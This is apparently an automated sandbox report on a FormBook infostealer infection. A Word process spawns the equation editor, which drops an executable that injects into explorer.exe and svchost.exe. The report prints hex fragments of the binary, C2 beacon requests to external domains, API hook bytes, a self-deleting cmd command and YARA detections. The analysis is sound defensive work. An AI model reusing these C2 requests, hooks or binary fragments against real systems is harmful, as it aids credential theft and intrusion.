d2 0b 02 07 02 7b 02 00 00 04 28 06 00 00 06 7d 02 00 00 04 02 06 02 7b 02 00 00 04 28 06 00 00 06 7d 02 00 00 04 02 7b 02 00 00 04 66 0c 2b 00 08 2a 00 13 30 02 00 58 00 00 00 05 00 00 11 00 15 0a 02 6f 24 00 00 0a 0b 16 13 05 2b 36 00 07 17 59 0b 02 07 6f 25 00 00 0a 0c 00 08 20 ff 00 00 00 5f d2 0d 08 1e 63 d2 13 04 00 11 04 06 28 06 00 00 06 0a 09 06 28 06 00 00 06 0a 00 11 05 17 58 13 05 07 16 fe 02 13 06 11 06 2d c0 06 66 13 07 2b 00 11 07 2a 13 30 02 00 30 00 00 00 06 00 00 11 00 15 0a 02 8e 69 0b
                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL/Ra0| @ @4OL H.text{ | `.rsrcL~@@.reloc@BhHp4{*:(}*0$u,({{o +*v iyE )UUZ({o!X*0Mrp%{-q-&+o"(#*0~a _da+*0{+*&}*0(+*0? _c{(}{(}{f+*0Xo$+6Yo% _c((X-f+*00i


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    1192.168.2.224916699.83.154.11880C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Sep 28, 2021 20:44:09.686778069 CEST661OUTGET /if60/?xPDxn6=9rThgvBPeDs8DTH&9rK4ARq=HAVwTDf9hhdM5uVFiR32xlZPJI7px6PgcsWLOsR2qKnXYIicfNgC1ah67lW/5Lf7WlrZFg== HTTP/1.1
                                                    Host: www.personowner.guru
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Sep 28, 2021 20:44:09.848998070 CEST661INHTTP/1.1 403 Forbidden
                                                    Date: Tue, 28 Sep 2021 18:44:09 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Server: nginx
                                                    Vary: Accept-Encoding
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    2192.168.2.224916763.250.43.880C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Sep 28, 2021 20:44:30.571886063 CEST662OUTGET /if60/?9rK4ARq=hKBoXJ/uTBXo6goup8EgTG8p/x7KMVUxfENEE605vE090EN0jXzIfy3RZCXjDv+XGbJHcA==&xPDxn6=9rThgvBPeDs8DTH HTTP/1.1
                                                    Host: www.audiofactaesthetic.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Sep 28, 2021 20:44:30.735729933 CEST663INHTTP/1.1 404 Not Found
                                                    content-type: text/html
                                                    date: Tue, 28 Sep 2021 18:44:30 GMT
                                                    transfer-encoding: chunked
                                                    connection: close
                                                    Data Raw: 33 31 45 41 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 62 73 69 74 65 20 69 73 20 62 65 69 6e 67 20 63 72 65 61 74 65 64 e2 80 a6 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 45 41 41 41 41 42 41 43 41 59 41 41 41 43 71 61 58 48 65 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 43 48 68 4a 52 45 46 55 65 41 48 64 57 32 6c 73 48 45 55 57 72 71 71 5a 73 54 33 6a 32 46 6d 62 48 42 78 42 58 73 79 47 73 41 73 43 43 52 49 52 67 6a 69 63 41 32 4a 48 52 41 74 45 51 74 48 43 6a 32 69 31 69 68 41 53 67 6e 43 45 4f 46 6e 45 6a 39 6a 68 4e 41 67 70 49 43 37 78 41 36 52 6f 45 59 65 49 69 42 30 57 45 67 64 4c 69 59 53 53 72 41 54 69 32 4a 42 73 49 42 41 4d 50 6d 49 6e 64 6a 7a 6a 65 44 78 56 2b 37 33 78 74 4e 55 7a 37 75 6e 70 71 75 6b 5a 6a 2b 67 66 72 75 70 36 72 39 37 33 76 61 2b 72 71 32 71 36 32 35 77 56 2b 4c 6a 77 30 4b 75 52 6f 64 35 54 69 35 52 53 53 78 52 6e 69 78 52 6a 63 7a 68 6a 4e 59 43 74 55 55 78 52 79 54 6a 6a 67 79 67 47 59 52 75 45 72 5a 63 72 64 70 42 7a 66 71 42 36 7a 6e 6b 48 75 78 65 75 6a 35 4a 50 6f 51 37 67 2b 58 39 63 65 2b 6a 56 30 48 2f 37 42 74 5a 49 4a 65 39 6e 54 46 33 48 46 41 73 61 6f 58 41 32 44 6e 6d 2b 45 46 78 73 76 33 78 32 37 58 75 48 46 36 36 50 47 38 56 78 36 65 53 72 41 48 2f 73 66 4b 75 69 4c 39 72 39 45 4b 37 6b 2f 62 69 36 46 37 6e 67 61 70 73 77 53 6e 34 42 32 65 30 58 38 4b 71 32 59 30 30 50 6e 4e 4d 4f 6b 4b 57 44 62 77 4a 55 64 54 79 39 49 43 48 6a 2f 30 4c 79 56 32 66 42 38 71 55 5a 68 4c 38 4d 69 4e 44 64 77 34 30 62 6a 2f 67 52 55 50 67 52 70 4c 4a 39 32 39 2f 47 31 66 6a 68 51 69 64 50 58 41 6d 44 73 41 6a 54 44 2b 35 35 6a 34 42 49 52 2b 74 71 4a 65 57 48 49 4f 4f 4c 6d 42 70 4a 53 53 37 45 48 64 48 47 35 70 30 61 66 61 61 34 35 69 56 41 5a 55 66 4c 56 56 4b 70 2f 62 67 73 4d 36 5a 45 4c 6b 59 44 5a 32 63 46 35 7a 65 4d 4e 47 37 2b 79 68 54 4f 2b 4b 72 4e 4f 39 41 57 6c 6c 4c 74 6e 4c 62 6b 4b 57 4d 49 54 78 79 49 53 39 45 46 4f 48 55 36 75 68 36 67 64 61 62 41 50 76 61 72 53 33 45 78 43 6d 6c 30 43 39 42 79 31 78 76 72 50 6f 37 4e 7a 51 56 47 71 44 35 33 77 71 62 70 31 7a 6e 68 43 2b 74 2f 62 46 67 33 71 68 76 61 36 42 62 6f 6a 58 62 2f 76 56 53 53 70 34 53 4a 43 33 48 53 54 5a 37 38 6a 51 51 41 35 46 39 4e 77 41 72 62 78 34 79 54 74 67 42 58 66 50 4e 75 47 64 62 69 4a 59 56 4e 52 6a 38 36 63 53 4a 75 75 6a 32 31 42 66 6a 70 35 32 50 58 41 53 53 69 43 31 51 45 2f 30 69 4b 6d 78 61 55 74 67 41 4a 79 57 37 55 51 69 69 69 73 77 6b 33 62 51 47 51 54 30 6e 4d 2f 46 6c 30 31 65 61 6d 4c 59 42 53 38 72 77 73 34 4e 50 65 62 4d 4a 4e 57 77 43 73 75 62 4f 6d 50 64
                                                    Data Ascii: 31EA<!doctype html><html class="no-js" lang=""><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>Website is being created</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <link rel="apple-touch-icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAYAAACqaXHeAAAAAXNSR0IArs4c6QAACHhJREFUeAHdW2lsHEUWrqqZsT3j2FmbHBxBXsyGsAsCCRIRgjicA2JHRAtEQtHCj2i1ihASgnCEOFnEj9jhNAgpIC7xA6RoEYeIiB0WEgdLiYSSrATi2JBsIBAMPmIndjzjeDxV+73xtNUz7unpqukZj+gfrup6r973va+rq2q625wV+Ljw0KuRod5Ti5RSSxRnixRjczhjNYCtUUxRyTjjgygGYRuErZcrdpBzfqB6znkHuxeuj5JPoQ7g+X9ce+jV0H/7BtZIJe9nTF3HFAsaoXA2Dnm+EFxsv3x27XuHF66PG8Vx6eSrAH/sfKuiL9r9EK7k/bi6F7ngapswSn4B2e0X8Kq2Y00PnNMOkKWDbwJUdTy9ICHj/0LyV2fB8qUZhL8MiNDdw40bj/gRUPgRpLJ929/G1fjhQidPXAmDsAjTD+55j4BIR+tqJeWHIOOLmBpJSS7EHdHG5p0afaa45iVAZUfLVVKp/bgsM6ZELkYDZ2cF5zeMNG7+yhTO+KrNO9AWllLtnLbkKWMITxyIS9EFOHU6uh6gdabAPvarS3ExCml0C9By1xvrPo7NzQVGqD53wqbp1znhC+t/bFg3qhva6BbojXb/vVSSp4SJC3HSTZ78jQQA5F9NwArbx4yTtgBXfPNuGdbiJYVNRj86cSJuuj21Bfjp52PXASSiC1QE/0iKmxaUtgAJyW7UQiiiswk3bQGQT0nM/Fl01eamLYBS8rws4NPebMJNWwCsubOmPd


                                                    Code Manipulations

                                                    User Modules

                                                    Hook Summary

                                                    Function NameHook TypeActive in Processes
                                                    PeekMessageAINLINEexplorer.exe
                                                    PeekMessageWINLINEexplorer.exe
                                                    GetMessageWINLINEexplorer.exe
                                                    GetMessageAINLINEexplorer.exe

                                                    Processes

                                                    Process: explorer.exe, Module: USER32.dll
                                                    Function NameHook TypeNew Data
                                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE9
                                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE9
                                                    GetMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE9
                                                    GetMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE9

                                                    Statistics

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Start time:20:42:18
                                                    Start date:28/09/2021
                                                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    Wow64 process (32bit):false
                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                    Imagebase:0x13fc30000
                                                    File size:1423704 bytes
                                                    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate

                                                    General

                                                    Start time:20:42:19
                                                    Start date:28/09/2021
                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                    Imagebase:0x400000
                                                    File size:543304 bytes
                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:20:42:20
                                                    Start date:28/09/2021
                                                    Path:C:\Users\user\AppData\Roaming\ibeframnk863.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Roaming\ibeframnk863.exe
                                                    Imagebase:0xff0000
                                                    File size:624640 bytes
                                                    MD5 hash:CE20BD8F40F78DA603DD17D756745B0A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.420274782.0000000002491000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Antivirus matches:
                                                    • Detection: 20%, ReversingLabs
                                                    Reputation:low

                                                    General

                                                    Start time:20:42:24
                                                    Start date:28/09/2021
                                                    Path:C:\Users\user\AppData\Roaming\ibeframnk863.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\AppData\Roaming\ibeframnk863.exe
                                                    Imagebase:0xff0000
                                                    File size:624640 bytes
                                                    MD5 hash:CE20BD8F40F78DA603DD17D756745B0A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Start time:20:42:24
                                                    Start date:28/09/2021
                                                    Path:C:\Users\user\AppData\Roaming\ibeframnk863.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Roaming\ibeframnk863.exe
                                                    Imagebase:0xff0000
                                                    File size:624640 bytes
                                                    MD5 hash:CE20BD8F40F78DA603DD17D756745B0A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

                                                    General

                                                    Start time:20:42:25
                                                    Start date:28/09/2021
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Explorer.EXE
                                                    Imagebase:0xffa10000
                                                    File size:3229696 bytes
                                                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group

                                                    General

                                                    Start time:20:43:03
                                                    Start date:28/09/2021
                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\svchost.exe
                                                    Imagebase:0x5e0000
                                                    File size:20992 bytes
                                                    MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group

                                                    General

                                                    Start time:20:43:05
                                                    Start date:28/09/2021
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:/c del 'C:\Users\user\AppData\Roaming\ibeframnk863.exe'
                                                    Imagebase:0x4a110000
                                                    File size:302592 bytes
                                                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Disassembly

                                                    Code Analysis

                                                    Reset < >